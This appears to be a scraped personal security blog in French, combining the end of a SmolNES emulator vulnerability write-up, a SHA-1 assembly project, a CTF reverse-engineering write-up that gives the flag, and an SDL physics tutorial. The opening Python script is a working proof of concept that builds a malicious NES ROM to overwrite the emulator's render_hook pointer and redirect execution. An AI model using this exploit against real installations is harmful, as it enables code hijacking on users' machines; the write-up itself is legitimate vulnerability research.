INTRA_OFFSET  = HOOK_OFFSET % 4096  # = 2168 = 0x878

assert BANK_INDEX in [2, 4, 6], f"Bank {BANK_INDEX} not reachable with Mapper 3 (val%4*2)"
MAPPER_VAL = BANK_INDEX // 2        # val such that val%4*2 = BANK_INDEX => val = BANK_INDEX/2

# V = INTRA_OFFSET (using bank 0 to access via chr[0])
V = INTRA_OFFSET  # 0x878

V_HIGH = (V >> 8) & 0x3F            # high byte for $2006 (6 bits)
V_LOW  = V & 0xFF                   # low byte for $2006

TARGET_BYTES = TARGET_ADDR.to_bytes(8, 'little')

print(f"[*] render_hook offset from chrram: {HOOK_OFFSET} (0x{HOOK_OFFSET:04X})")
print(f"[*] Bank index: {BANK_INDEX} => mapper write val={MAPPER_VAL} to $8000")
print(f"[*] V = 0x{V:04X} => $2006 writes: 0x{V_HIGH:02X} then 0x{V_LOW:02X}")
print(f"[*] Target: 0x{TARGET_ADDR:016X}")
print(f"[*] Little-endian bytes: {TARGET_BYTES.hex()}")

# ---- 6502 code construction ----
code = bytearray()

def nop():
    return bytes([0xEA])

def lda_imm(val):
    return bytes([0xA9, val])

def sta_abs(addr):
    return bytes([0x8D, addr & 0xFF, addr >> 8])

def jmp_abs(addr):
    return bytes([0x4C, addr & 0xFF, addr >> 8])

# Step 1: Mapper 3, write to $8000 to set chr[0] = BANK_INDEX
code += lda_imm(MAPPER_VAL)
code += sta_abs(0x8000)

# Step 2: set V via two consecutive writes to $2006
code += lda_imm(V_HIGH)
code += sta_abs(0x2006)
code += lda_imm(V_LOW)
code += sta_abs(0x2006)

# Step 3: write the 8 bytes of TARGET_ADDR via $2007
# get_chr_byte(V) => &chrram[HOOK_OFFSET] = &render_hook
# V auto-increments by 1 after each access => consecutive writes
for byte in TARGET_BYTES:
    code += lda_imm(byte)
    code += sta_abs(0x2007)

# Infinite loop (NOP + JMP) to let the PPU advance to scany==241
nop_offset = len(code)
code += nop()                            # NOP
code += jmp_abs(0x8000 + nop_offset)     # JMP back to NOP

print(f"[*] Code size: {len(code)} bytes (starts at $8000)")
print(f"[*] NOP loop at $8000+{nop_offset} = $" + f"{0x8000+nop_offset:04X}")

# ---- iNES ROM construction ----
PRG_SIZE = 16384  # 1 PRG bank = 16 KB

# iNES header (16 bytes)
header = bytearray(16)
header[0:4] = b'NES\x1a'
header[4] = 1         # 1 PRG bank (16 KB)
header[5] = 0         # 0 CHR banks => CHR-RAM mode
header[6] = 0x30      # Mapper 3 (high nibble = 3), horizontal mirroring
# bytes 7-15 = 0x00

# PRG ROM: filled with NOPs (0xEA), code at the start, reset vector at the end
prg = bytearray(nop() * PRG_SIZE)

# Code at offset 0 ($8000)
prg[0:len(code)] = code

# Reset vector at $FFFC-$FFFD (offset 0x3FFC in PRG): points to $8000
prg[PRG_SIZE-4] = 0x00   # low byte of $8000
prg[PRG_SIZE-3] = 0x80   # high byte of $8000

rom = bytes(header) + bytes(prg)

output_path = "poc_deadbeef.nes"
with open(output_path, "wb") as f:
    f.write(rom)

print(f"\n[+] ROM written: {output_path} ({len(rom)} bytes)")
print(f"[+] Run: ./smolnes/deobfuscated {output_path}")
print(f"[+] Expected: SIGSEGV / call to 0x{TARGET_ADDR:X} after ~1 PPU frame")

References

NESDev Wiki: the definitive resource for NES technical details
NesHacker playlist: excellent explanations of NES internals

SHA-1 from scratch in assembly

Nov 23, 2025

D’où vient ce projet ?

Lors de ma deuxième année d’étude, dans le cadre d’un cours d’assembleur j’ai eu l’opportunité de me lancer un défi : créer un système d’authentification sécurisé simple, permettant à un utilisateur de se connecter à une application fictive. Le coeur principalement intérêssant de ce projet résidait dans le traitement sécurisé de mots de passe, ce qui signifiait implémenter un algorithme de hashage.

Pour cela je me suis orienté vers l’algorithme SHA-1, bien qu’il soit considéré comme cryptographiquement dépassé aujourd’hui, celui-ci reste proche algorithmiquement de son évolution SHA-2 (qui lui est toujours valide à ce jour) tout en limitant sa complexité d’implémentation, et évitant tout de même d’être ridiculement faible à la manière du MD5.

Méthodologie

Mon approche pour ce projet s’est déroulée en trois étapes clés :

Compréhension théorique : Pour la compréhension conceptuelle de l’algorithme je me suis servis de cette page de Brilliant, qui explique rigouresement d’un point de vue mathématique comment fonctionne l’algorithme.
Prototypage : Partir d’une page blanche et convertir directement l’algo de la théorie à l’assembleur est une tâche difficile. Pour créer une étape intermédiaire, je me suis basé sur une implémentation Javascript de référence. A partir de celle-ci, j’ai ensuite utilisé ChatGPT comme un outil d’assistance pour traduire la logique en C. L’objectif était d’obtenir rapidement un code “proche de la machine”, qui manipulait directement les octets et les mots, afin d’avoir un modèle clair avant de descendre au niveau des registres.
Conversion en Assembleur : Cette étape a représenté le coeur du projet. J’ai traduit la logique du programme du C vers l’assembleur, me confrontant évidemment à des défis inattendu, bien au delà de la simple traduction.

Démonstration

Voici un texte hashé avec mon implémentation :

Et le même texte hashé sur un site en ligne :

Un point technique intéressant : Hexadécimal vs sa Représentation

Créer un programme de ce type en n’ayant aucune couche d’abstraction nous met parfois face à des problématiques innatendu, généralement implicite dans les langages plus haut niveau.

En effet par exemple, l’algorithme nous permet de générer un hash du contenu d’entrée, qui est affiché en tant qu’une représentation hexadécimale des valeurs réellement utilisé dans le calcul (et donc présente mémoire).
Pour clarifier cela, notez que le chiffre hexa 0x11 est stocké en mémoire tel quel (en tant que 11 hexa), mais sa représentation est stocké avec les charactères texte 1, ayant pour valeur ascii 0x31. Donc la représentation de la valeur 0x11 en mémoire est 0x3131 lorsqu’elle doit être affiché en ascii.

Il y a donc une étape de convertion supplémentaire nécessaire à la fin de l’algorithme, cela est habituellement pris en charge par les fonctions de formatage en C :

// h0 - h4 sont des valeurs hexa pure
// les "%x" indique implicitement à sprintf d'effectuer la conversion discutés
sprintf(output, "%08x%08x%08x%08x%08x", h0, h1, h2, h3, h4);

Réimplémenter ce comportement en assembleur a été un exellent exercice de manipulation de chaîne de caractères au plus bas niveau.

Limites

Mon implémentation fonctionne correctement pour les entrées jusqu’à 31 caractères. Au-delà, le hash produit diverge de la référence.

C’est après coup que j’ai découvert la limite, et ne m’étant pas replongé dans le code je ne saurais pas dire d’où vient l’erreur. La coïncidence de la limite à 31 caractères est tout de même suspecte : 32 caractères = 256 bits, ce qui suggère un problème de buffer ou un off-by-one à cette frontière.

Vous trouverez le code source sur le répository suivant :

Github

Hack'in 2025 - Reverse - Animal Fabuleux

Jun 15, 2025

Ce write-up a été rédigé “à chaud” peu après l’événement en juin 2025. J’ai choisi de le laisser dans son état originel pour qu’il serve de snapshot fidèle de mon niveau de compréhension à ce moment précis.

Avec le recul et l’expérience acquise depuis, je relève aujourd’hui certaines approximations terminologiques. Par exemple, je désigne dans l’analyse une zone mémoire mappée pour les instructions comme étant une “Stack 2”, alors qu’il serait techniquement plus juste de parler de section .text ou de segment de code.

Malgré ces imperfections, l’objectif de cet article reste d’écrire le write-up que j’aurais aimé lire si j’avais bloqué sur ce challenge. J’ai donc privilégié une approche pédagogique et la retranscription de mon cheminement de pensée, quitte à laisser transparaître mes imprécisions de l’époque.
Par ailleurs, cela laisse une trace, qui me permet de revenir et de voir le chemin parcouru.

Achievement : First Blood sur ce challenge lors de l’événement !

Fichier fourni : animal_fabuleux

L’objectif est de trouver le bon argument (flag) à passer à ce programme.

Analyse

Un premier file nous indique que nous avons affaire à un binaire ELF 64-bit.

~/Downloads/Hackin  file animal_fabuleux
animal_fabuleux: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=703e8337a1f696300ff09ab3426e26afa98bda38, for GNU/Linux 3.2.0, stripped

Je remarque aussi que celui-ci est stripped, ce qui rendra le travail un peu moins agréable, mais cela reste un inconvénient mineur.

Ensuite effectuer strings filtré par |grep flags révèle les chaînes suivantes :

~/Downloads/Hackin  strings animal_fabuleux |grep flag
wrong flag
well done! you can use this flag to validate the challenge: HNx04{%s}
Usage: %s <flag>

Enfin, avant de commencer le désassemblage, j’essaie de lancer le programme et constate cette erreur :

~/Downloads/Hackin  ./animal_fabuleux blablabla
./animal_fabuleux: error while loading shared libraries: libunicorn.so.2: cannot open shared object file: No such file or directory

Cela nous donne un indice énorme, le programme utilise une librairie nommée Unicorn
Après une rapide recherche google, j’apprends ce qu’est Unicorn : “Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework.”

Ma première réaction a été “Oula, les problèmes”, et réfléchir à changer de challenge. Mais j’ai décidé de ne pas me laisser décourager par l’aura intimidante de celui-ci.

Après avoir installé la librairie, voici le résultat du programme :

~/Downloads/Hackin  ./animal_fabuleux testaaa
wrong flag

J’ai remarqué qu’entre son lancement et l’affichage de “wrong flag”, il y avait un délai, ce qui est probablement une mesure anti-bruteforce.
De plus, nous pouvons nous attendre à ce que la chaîne de retour si nous trouvons le bon flag soit : well done! you can use this flag to validate the challenge : HNx04{cequejaientré}, comme nous l’avons vu dans les strings

Takeaway :

Binaire stripped, pas de symbols utile
Le flag est au format HNx04{%s}
Une librairie d’émulation de CPU est utilisé (Unicorn)

Désassemblage

Après avoir passé le programme dans Binary Ninja, je constate que le plus gros de la logique se déroule dans la fonction main. Celle-ci se décompose en 3 parties :

Vérification du contexte
Initialisations
Boucle logique principale

Vérification du contexte

Fonction main, vérification du contexte Le programme demande exactement deux arguments (son propre nom, puis le flag)
Puis il attend une seconde (la mesure anti-bruteforce)
Et vérifie si l’argument 1 (notre flag) a bien une longueur de 8 caractères. Dans le cas contraire la fonction sub_4011d9 (qui après inspection affiche la chaîne wrong flag) est appelé et le programme s’arrête.
Nous pouvons donc renommer sub_4011d9 en showFailText et continuer.

Takeaway : le flag fait 8 caractères

Initialisations

Ici, nous repérons plusieurs utilisations de fonctions commençant par uc_, en remontant à leurs définitions, nous constatons que ce sont des fonctions externes : Ce sont à coup sûr les fonctions venant de UniCorn (UC).

N’ayant pas trouvé de documentation explicite pour ces fonctions, je me suis rabattu sur le tutoriel sur le site officiel d’Unicorn, qui donne une vue d’ensemble de comment s’utilisent ces fonctions. À partir de cela j’ai donc déduit l’utilité de chacune d’entre elles et la signification de leurs paramètres.

uc_open
uc_mem_map
uc_mem_write
uc_emu_start
uc_mem_read (non présent dans l’exemple)

Prenons ces fonctions une à une :

uc_open

Nous voyons que uc_open prend un paramètre d’architecture, de mode, et un pointeur sur (supposément) une structure uc_engine.

Dans le fichier unicorn.h trouvable sur github, nous pouvons voir les valeurs associées à ces flags.

Dans notre cas, l’appel était uc_open(2, 0, &var_20) ce qui correspond à uc_open(UC_ARCH_ARM64, UC_MODE_ARM, &var_20).
Le mode pourrait aussi être UC_MODE_LITTLE_ENDIAN, mais cela revient probablement au même si ARM utilise le little endian par défaut.

Takeaway: Le processeur simulé est de l’architecture ARM64 (AArch64).

uc_mem_map / uc_mem_write

uc_mem_map semble permettre de définir une plage de mémoire utilisable pour l’émulation du processeur, quant à uc_mem_write, elle semble permettre d’écrire un nombre de bytes à une adresse donnée. Nous avons donc deux fonctions permettant de manipuler les données écrites dans la mémoire virtuelle.

À partir de ces informations, nous pouvons donc modifier les noms/types des variables pour y voir plus clair :

Ce que fait ce code est donc d’initialiser l’émulation du CPU virtuel avec deux zones mémoire. La première se situant à l’adresse 0x1000 jusqu’à 0x1400 (appelons la stack 1), et la deuxième s’étendant de 0x4000 à 0x104000 (appelons la stack 2). Cette dernière a reçu l’écriture d’une suite d’instructions sous forme d’opcodes que nous pouvons trouver dans la mémoire statique du programme.

Enfin, il y a aussi une mystérieuse constante qui est initialisée avec la valeur 0x4c53, que j’ai donc nommée someConstant_4c53.

Takeaway :

Deux zones de mémoire virtuelles sont en place : 0x1000 - 0x1400 -> zone pour les données 0x4000 - 0x104000 -> zone pour le code
Une constante inutilisée pour l’instant existe, sa valeur est 0x4c53

Boucle logique principale

Rendu à ce moment du désassemblage, il nous reste quelques variables à déduire :

sub_4011ef -> fonction affichant le flag, c’est donc le code que nous visons
var_c_1 -> semble être un compteur s’incrémentant à chaque passage dans la boucle, si nous parvenons à le rendre égal ou supérieur à 2, nous aurons le flag
rax_35 -> clairement un stockage d’erreur
var_30 -> sûrement un booléen, doit être false pour ne pas sortir de la boucle et incrémenter la variable var_c_1 qui nous permettra d’avoir le flag.
data_40210f -> contient deux null-bytes
var_11_1 -> parait parfaitement inutile

Avant de passer à l’interprétation, réécrivons le nom des variables pour clarifier :

Que fait donc cette partie du programme ? Le but pour avoir le flag est de réussir à boucler au moins deux fois dans le while, sans break, afin que counter >= 2 soit true et afficher le flag. Pour ce faire nous devons donc comme dit éviter le break dans le if (isWrongFlag), et cette variable est définie par la lecture de ce qu’il se trouve à l’adresse 0x1005 dans notre stack virtuelle (stack 1).

À partir de là, nous devons comprendre ce qu’il se passe dans le CPU virtuel pour déterminer comment garder isWrongFlag à false.

Tout d’abord la boucle while actuelle ne manipule qu’uniquement la stack 1, cela fait sens, car la stack 2 est réservé aux instructions et ne doit donc pas être modifiée.

Le premier mem_write écrit dans un premier temps 4 caractères à l’adresse 0x1000, venant de notre argv[1] (donc notre flag passé en argument). Ces 4 caractères sont sélectionnés avec un décalage (offset) de counter * 4. Donc offset 0 au premier tour, et offset 4 au second. Autrement dit, si nous passons le flag 12345678 à notre programme, la chaîne 1234 sera écrite à l’adresse 0x1000 lorsque counter est à 0 (première exécution de la boucle while), puis 5678 sera écrit quand counter == 1.

Le deuxième mem_write écrit 1 byte à l’adresse 0x1004 (donc juste après les 4 caractères du dessus), venant de la constante de l’adresse de someConstant (+ counter) qui est égale à 0x4c53. Sachant que ce système utilise le little endian et que nous n’écrivons qu’un byte, le 0x53 uniquement sera lu en premier. Puis une fois que counter sera à 1, l’adresse de someConstant + 1 pointera vers le 0x4c

Enfin, le troisième mem_write écrit un null-byte (0x00), à l’adresse 0x1005, afin de remettre à zéro le booléen de validité du flag, dans la stack virtuelle.

Finalement, nous avons la fonction uc_emu_start qui est appelé et qui lance l’émulation dans ces conditions grâce aux données insérées dans la stack jusqu’à présent.

Nous connaissons désormais tous les tenants et aboutissants, la seule chose restante à comprendre afin de former un flag est ce qu’il se passe dans les instructions du processeur ARM. Ce dernier contient la clé du crackage de ce challenge.

Reverse du processeur virtuel

Voici la liste d’opcode écrit dans la stack 2 (d’instructions) du processeur virtuel : 800082d200004039081400d10a0082d2940080524b0140396b01084a7f01007180000054250080d2a40082d2850000f9080900914a050091940600519f020071a1feff5400

N’ayant jamais fait d’ARM auparavant, j’ai dû jongler entre le désassembleur en ligne et de la documentation (assistée par LLM pour accélérer la compréhension des subtilités de l’architecture) pour traduire les opcodes en logique compréhensible.

Grâce au désassembleur de Shell-Storm, nous pouvons spécifier notre architecture, et récupérer de l’assembleur ARM, lisible permettant de travailler : Afin de comprendre ce que cela signifie, essayons de traduire cela en Pseudo-C littéralement : Nous avons une base, mais cela reste peu clair, donc après avoir analysé le sens de mon propre code, voici l’algorithme qui est exécuté sur le CPU ARM :

Grâce à cela, nous savons enfin que la variable mystère someConstant est utilisée comme “clé de chiffrement”, et nous permet de trouver le flag. En effet, comme nous l’avons vu auparavant, cet algorithme sera appelé deux fois pour les deux moitiés de notre flag à 8 caractères. Et grace à ce code, nous voyons que la lettre du flag passée doit être égale à la clé passée, + un ajout de 2 à cette clé à chaque passage. Sans oublier que la clé passée à l’origine se voit soustraire 5.

Nous avons donc pour les 4 premières lettres (key passed: 0x53) : 0x53 - 0x5 = 0x4E -> (+0x2) = 0x50 -> (+0x2) = 0x52 -> (+0x2) = 0x54

Puis pour les 4 lettres suivantes (key passed: 0x4c) : 0x4c - 0x5 = 0x47 -> (+0x2) = 0x49 -> (+0x2) = 0x4B -> (+0x2) = 0x4D

Notre flag théorique final est donc \x4e\x50\x52\x54\x47\x49\x4b\x4d Qui équivaut à NPRTGIKM

Et voilà GG !

Améliorations méthodologiques possibles

C’est maintenant en écrivant ce write-up que je suis tombé sur l’Unicorn Engine API Documentation, ce dernier contient une bonne quantité d’informations dont j’aurais eu besoin pour comprendre le fonctionnement des fonctions de cette librairie sans avoir à les déduire depuis le tutoriel.

Cela m’aurait permis de gagner du temps, mais d’un autre côté avoir été contraint de deviner le fonctionnement de l’API a été un excellent exercice ayant renforcé ma compréhension de la logique bas niveau.

Un autre point d’amélioration possible aurait été de désassembler la chaîne d’opcode elle même, afin de me donner accès directement à du pseudo C, permettant ainsi une compréhension rapide de cette partie.
Cependant n’ayant jamais fait d’ARM auparavant je pense qu’être passé par la manière manuelle a aussi été une opportunité d’en apprendre sur cette architecture, ce qui me fera gagner du temps sur mes prochains challenges. Pour la suite, il faudra que je sache utiliser du désassemblage automatisé pour la rapidité, tout en ayant appris cette architecture pour être capable de descendre à l’assembleur pour comprendre les subtilités quand nécessaire.

Remerciements

Merci à toute l’équipe du Hack’in pour l’événement, et au créateur de ce super challenge !
J’en garde un très bon souvenir, et ai hâte de la prochaine édition :)

(Et merci pour la banane Wannacry et les pins ahah) Image de sacoche "Wannacry" et Pins "Hardcore" et "First Blood"

Créer un système de physique avec SDL

Dec 28, 2024

Cet article s’attarde sur la création de comportements liés à la physique (gravité, collisions, rebonds) dans le contexte du développement de DuckDuckGame. Elle ne couvre pas la représentation des objets dans l’espace, mais uniquement la physique appliquée à ces objets.

La gravité

Pour créer de la gravité, c’est très simple, il suffit qu’à un intervalle régulier de temps (chaque image), la vitesse verticale d’un objet augmente. Pour cela il suffit d’avoir une variable représentant cette vitesse, puis d’y ajouter une valeur définie tel que dans le code suivant :

speed += 0.2;
personnage->rect->y += speed;

Et voila ! Notre personnage tombe.
Il faut noter que cette approche dépend du nombre de fois que cette fonction est exécutée par seconde. Le plus, le plus vite sera la chute. Pour palier à cela il nous faudrait une variable contenant le temps depuis la dernière image (connu sous le nom de DeltaTime), et multiplier notre augmentation de vitesse par celle-ci (afin que si le nombre d’image par seconde est élevé, la distance parcouru soit petite, et inversement).
Cependant obtenir un tel nombre a ses propres défis techniques, et c’est pour cela que dans la suite de ce document nous assumerons que le nombre d’image par seconde est fixe.

Les collisions

Le premier code permettant de gérer des collisions était celui-ci :

speed += 0.2;
if (personnage->rect->y >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

Il se basait sur une variable speed (qui représentait la vitesse verticale) qui était ajoutée au personnage à chaque frame, le faisant ainsi tomber en accélérant.
En guise de sol, nous avions les coordonnées Y=500 auquel le personnage était ramené s’il les dépassait.

À noter que rect->y représente le bord supérieur du personnage : à y=500 son sommet est à 500, son bas à 500+h, donc légèrement dans le sol. La position correcte serait personnage->rect->y = 500 - personnage->rect->h, mais cela ne change pas la démonstration du principe.

Cependant cette méthode amenait un léger problème :
Quand le personnage tombe de haut, sa vitesse faisait qu’il dépassait visiblement la barrière des 500, et était ramené à l’image d’après, donnant un effet de rollback.

Anticipation de la prochaine position

La correction à ceci a été d’anticiper la prochaine position du personnage à l’image d’après pour le placer directement à la bonne position (nous aurions pu vérifier de nouveau la position Y du personnage avant de le render, mais cela revient un peu au même). Ce concept d’anticipation de la prochaine position sera un fondement dans la suite du développement de ce système de collision.

Voici le code implémentant cette idée :

speed += 0.2;
if (personnage->rect->y + speed >= 500) {
    personnage->rect->y = 500;
    speed = 0;
}
personnage->rect->y += speed;
render(personnage);

(Le ”+ speed” après la position Y du perso, dans le if, modification discrète mais très efficace)

A partir de là, nous pouvons améliorer la structure d’un objet de manière à ce qu’elle puisse stocker les valeurs de vitesse X et Y de l’objet.
Et nous créerons une fonction (GetNextPosition) utilisant cela afin de retourner le Rect de la prochaine position de notre objet.

Collisions objet à objet

Maintenant, la prochaine étape sera d’améliorer ce avec quoi notre joueur a une collision. Pour l’instant nous utilisons simplement une hauteur prédéfinie dans le code, alors essayons d’utiliser un autre objet du jeu !

Nous attaquons donc les collisions “Objet - Objet” :
Pour savoir si un objet est en collision avec un autre, nous devons savoir s’ils se chevauchent, en d’autres termes, s’il y a une intersection entre eux.
Comme nous n’utilisons uniquement des rectangles pour l’instant, nous pouvons utiliser de manière très pratique la fonction SDL nommée “SDL_IntersectRect”, qui permet de savoir s’il y a une intersection entre deux Rect, et si oui d’avoir le rectangle représentant cette intersection comme montré dans le schéma suivant :

Dans notre cas, nous aurons un personnage, qui intersectionne avec un rectangle qui représente le sol, comme suit :

Nous constatons donc la collision entre ces deux objets, et la fonction SDL_IntersectRect nous retournerait bien TRUE, de plus nous récupèrerions aussi l’équivalent du rectangle bleu ici, qui représente l’intersection de ces deux Rect.
Additionnellement, ce schéma ne représente pas l’utilisation de la simulation de prochaine position que nous avons créée plus tôt. Dans les faits, à un état de repos le personnage serait situé sur le sol, et gagnerait à chaque frame de la vélocité verticale (due à la gravité). Cela déplacerait sa boite de prochaine position dans le sol, permettant ainsi de détecter la collision, et annulerait la vitesse verticale gagnée -> faisant donc effectivement rester le personnage immobile sur le sol, l’empêchant de le traverser.

Dans notre code, tout ce que nous aurons à faire c’est détecter avec la fonction SDL_IntersectRect s’il y a une collision entre la future position de notre personnage, et l’objet collisioné. Et si c’est le cas, déplacer le joueur au dessus de celui-ci :
personnage->y = obstacle->y - personnage->height
OU
personnage->y = personnageNextPos->y - IntersectRect->height

SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
SDL_Rect* colliderNextPos = GetNextPos(collider); // GhostBox : projection de la position future du joueur
//N'oublions pas l'astuce d'utiliser la prochaine position de l'objet.

SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideePos, intersect);

if (hasCollided == SDL_TRUE) {
    collider->rect->y = collidee->rect->y - collider->rect->h;
}

free(intersect);

Maintenant, nous avons enfin un système permettant au personnage de tomber sur un objet, et d’y rester sans bouger !

Collisions multi-directionnelles

Cependant, nouveau problème :)
Le code présenté ci-dessus engendrerait des situations comme celle-ci :

Si notre joueur entre en collision depuis le côté avec ce qui représente le sol, il se fait téléporter au dessus de celui-ci.
Ce n’est de toute évidence absolument pas le comportement que nous désirons, nous devons donc adapter notre code afin qu’il puisse être plus généraliste.
L’objectif est de permettre de gérer proprement les collisions, qu’elles viennent aussi bien du côté, dessus ou dessous !

Mais pour commencer cantonnons nous à faire fonctionner les collisions pour 1 axe.
Notre code actuel fonctionne pour une collision sur 1 seul axe, ET en venant d’un seul côté de cet axe. En effet, si nous entrons en collision avec le sol que nous avons codé juste au dessus, nous nous faisons téléporter dessus ce dernier.

Pour commencer la résolution de ce problème, changeons d’abord d’axe. L’axe Y que nous utilisions jusqu’à présent était intuitif du point de vue de la gravité, cependant le fait que sa valeur augmente en descendant, ne l’est pas.
Prenons donc l’exemple d’un mur, et définissons les termes de l’explication :
Dans les exemples qui suivent, nous ferons référence à la prochaine position du joueur en tant que GhostBox, celle-ci est simplement une projection du joueur à partir de sa vélocité actuelle.

Très bien, grâce à ce que nous avons défini précédemment, cette collision serait résolue en plaçant le player juste collé au mur.

Voici le code complet implémentant les collisions de tous côtés, avec plusieurs objets simultanément :

WindowElement* collider = personnage;
SDL_Rect* colliderNextPos = GetNextPosition(collider); // GhostBox : projection de la position future du joueur

// Sachant que obs représente les objets du monde
for (unsigned i = 0; i < obs->lenght; ++i) {
    WindowElement* collidee = obs->objects + i; //mieux que &obs->objects[i]
    SDL_Rect* collideeNextPos = GetNextPosition(collidee);

    SDL_Rect* intersect = (SDL_Rect*) malloc(sizeof(SDL_Rect));
    SDL_bool hasCollided = SDL_IntersectRect(colliderNextPos, collideeNextPos, intersect);

    if (hasCollided == SDL_TRUE) {

        // À chacun de ces `if`, on vérifie la position du collider par rapport au collidee en utilisant leur position actuelle,
        // donc PAS leur future position. Mais tout en sachant que leur prochaine position est bien entrée en collision
        // Ici par exemple on sait qu'il VA y avoir collision, et on regarde si la collision vient du haut
        if (collider->rect->y + collider->rect->h <= collidee->rect->y)
        {
            collider->vY = 0;
            colliderNextPos->y -= intersect->h;
        }
        else if (collider->rect->y >= collidee->rect->y + collidee->rect->h) // collision vient du bas
        {
            collider->vY = 0;
            colliderNextPos->y += intersect->h;
        }

        if (collider->rect->x + collider->rect->w <= collidee->rect->x) // collision vient de gauche
        {
            collider->vX = 0;
            colliderNextPos->x -= intersect->w;
        }
        else if (collider->rect->x >= collidee->rect->x + collidee->rect->w) // collision vient de droite
        {
            collider->vX = 0;
            colliderNextPos->x += intersect->w;
        }
    }

    free(intersect);

    collidee->rect->x = collideeNextPos->x;
    collidee->rect->y = collideeNextPos->y;
}
// Maintenant que nous avons crafté une prochaine position cohérente, nous l'appliquons
collider->rect->x = colliderNextPos->x;
collider->rect->y = colliderNextPos->y;

Ordre de résolution des collisions

Cette implémentation a une subtilité : les collisions sont résolues dans l’ordre du tableau obs->objects. Dans DuckDuckGame, deux sols se téléportent en boucle pour simuler un défilement infini, et le joueur peut se retrouver simultanément en collision avec les deux à leur jonction.

Si A est résolu en premier, seule une collision verticale est détectée, elle est résolue correctement et B ne pose plus problème. En revanche si B est résolu en premier, la GhostBox déborde à la fois sur Y et sur X : les deux résolutions sont mutuellement exclusives. Notre code vérifiant Y avant X, le comportement dépend de laquelle des deux conditions est satisfaite, et au niveau d’une jonction, le joueur glissant horizontalement peut déclencher la collision X en premier, le faisant bloquer comme contre un mur invisible.

À noter que résoudre X avant Y ne réglerait pas le problème au niveau moteur : cela inverserait simplement le cas problématique. Deux murs superposés verticalement formeraient alors une plateforme invisible.

Plusieurs approches ont été envisagées pour déterminer l’ordre de résolution :

Distance naïve (centre à centre) : trier par distance entre le centre du joueur et le centre de chaque objet. Rejeté : si A et B ont des tailles radicalement différentes, la distance est biaisée par la taille et non par la proximité réelle.
Surface d’intersection : résoudre en priorité l’objet avec la plus grande surface de collision. Rend le problème moins probable mais ne le supprime pas.
Double calcul : calculer les deux résolutions possibles et retenir la plus éloignée. Coûteux et probablement soumis à des edge cases.
Projeté orthogonal : pour chaque objet, projeter orthogonalement le centre du joueur sur l’objet pour obtenir le point le plus proche lui appartenant, puis trier par cette distance. Règle le biais de taille tout en restant simple.

Dans la pratique, le problème était imperceptible dans le jeu final, donc cette approche est restée au stade de la réflexion.

Tentative : collisions continues

Cette approche est parfaitement fonctionnelle pour une utilisation classique, cependant elle a certaines limites dans des cas extrêmes. Imaginons que le Player aille à une vitesse très élevée, il serait possible que sa “GhostBox” passe directement derrière l’obstacle et par conséquent que le joueur le traverse. Voici un schéma illustrant ceci :

Nous pouvons essayer d’implémenter une solution avec SDL_UnionRect permettant de récupérer le rectangle contenant le joueur jusqu’à sa GhostBox (position future).

La seule différence par rapport au code précédent est la détection : au lieu d’utiliser directement la GhostBox, on construit une deltaBox couvrant le joueur de sa position actuelle jusqu’à sa GhostBox, puis on vérifie l’intersection avec celle-ci. La résolution reste identique.

SDL_FRect* deltaBox = (SDL_FRect*) malloc(sizeof(SDL_FRect));
SDL_UnionFRect(collider->rect, colliderNextPos, deltaBox);
SDL_bool hasCollided = SDL_HasIntersectionF(deltaBox, collideeNextPos);
free(deltaBox);

Après avoir testé cette méthode je vois un problème et en théorise un autre.
Le problème que je constate est que si le personnage est sur une plateforme qui monte, il ne peut plus sauter. Après investigation cela est dû au fait que dans ce code la boite d’union comprend la position actuelle du personnage et n’est pas basé uniquement sur ses positions futures. Cela a pour effet de créer une collision alors que dans le futur il n’y en aurait pas eu.
Ce problème peut être mitigé en enlevant la largeur et hauteur du Rect du perso à cette box et en la décalant dans la bonne direction.
Cependant ce problème m’a fait penser à un autre, ce système de boite d’union est présent pour avoir des collisions continues même si l’objet va à une haute vitesse. Cependant si l’objet va en diagonale la boite va s’étendre dans les deux directions diagonales tangentes et potentiellement entrer en collision avec un mur alors que l’objet serait simplement passé à côté avec un calcul normal. Pour régler cela il faudrait utiliser des raycasts afin de vérifier si une intersection LINEAIRE existe. Voir le schéma suivant :

Le système initial étant déjà suffisant pour ce que nous faisons, et n’ayant pas un temps illimité pour expérimenter, nous allons revenir à la version précédente du système de collision qui fait déjà suffisamment l’affaire. Cependant nous savons que si nous nécessitons éventuellement d’une version plus robuste, nous avons le modèle ici.

Le rebond

Implémenter un système de rebond une fois les bases physiques posées est plutôt simple.
Il nous suffit de définir un coefficient de rebond pour les objets du jeu, et de multiplier la vitesse du joueur sur l’axe de la collision par le négatif de ce coefficient ; inversant ainsi sa direction d’un facteur défini.
Exemple :
Le joueur avance de 5 vers la droite (mouvement sur X), il rencontre un obstacle avec un coefficient de rebond de 1.
Nous avons donc vitesse_joueur * -(coeff_rebond) = new_vitesse_joueur,
donc ici 5 * -1 = -5, notre joueur ira donc dans l’autre sens sans perte de vitesse, soit le comportement attendu.

Voici ce que cela donne en code :

// ...
// Si collision :

// Coefficient de rebond :
// 0 -> Aucun rebond
// 1 -> Rebond total, aucune perte de momentum
float bounciness = 1;

// Si collision sur axe Y, venant du dessus
if (collider->rect->y + collider->rect->h <= collidee->rect->y)
{
    // Négation de la vitesse Y et multiplication par le coefficient de rebond
    collider->vY *= -bounciness;

    // Gestion de la collision
}
// Gestion de l'axe Y venant du dessous et axe X similaire
// ...

À noter que cette formule suppose que le collidee est statique, ou du moins qu’il ne réagit pas à la collision (il pourrait par exemple être en mouvement linéaire, comme une plateforme qui se déplace). Dans le cas où les deux objets sont en mouvement et réagissent l’un à l’autre, il faudrait introduire la notion de masse et appliquer la conservation de la quantité de mouvement pour calculer les nouvelles vélocités des deux objets.

Blog

Vulnerability Research on SmolNES

Executive summary

Table of contents

1. Background and target selection

Why SmolNES?

2. Setting up the fuzzing environment

Preparing the binary

Compiling with AFL++

Seed corpus

Initial run

3. First results: initial crashes

4. Lead 1: OOB Read in PRG-ROM (abandoned)

5. Source code analysis

Overview of deobfuscated.c

Initialization: header parsing

The get_chr_byte() function

The central mem() function

6. Fuzzing iterations and optimizations

Iteration 1: SDL removal + cycle cap (result: 3 crashes, then stall)

Iteration 2: header patches + ASAN + 6502 dictionary

